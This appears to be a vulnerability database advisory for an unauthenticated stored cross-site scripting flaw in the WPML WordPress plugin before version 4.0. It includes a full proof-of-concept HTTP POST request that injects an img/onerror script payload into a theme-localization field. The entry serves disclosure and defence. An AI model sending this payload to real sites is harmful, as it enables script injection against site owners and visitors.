WordPress Plugin Vulnerabilities
WPML < 4.0 - Unauthenticated Stored Cross-Site Scripting (XSS)
Description
The sitepress-multilingual-cms WordPress plugin was affected by an Unauthenticated Stored Cross-Site Scripting (XSS) security vulnerability.
Proof of Concept
POST /wp-admin/admin.php?page=sitepress-multilingual-cms-3.6.3%2Fmenu%2Ftheme-localization.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 90 Cookie: wordpress_test_cookie=WP+Cookie+check Connection: close Upgrade-Insecure-Requests: 1 icl_post_action=save_theme_localization&locale_file_name_en="><img src=x onerror=alert(1)>
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Rahul Pratap Singh
Verified
No
WPVDB ID
Timeline
Publicly Published
2018-10-08 (about 5 years ago)
Added
2019-08-23 (about 4 years ago)
Last Updated
2021-01-19 (about 3 years ago)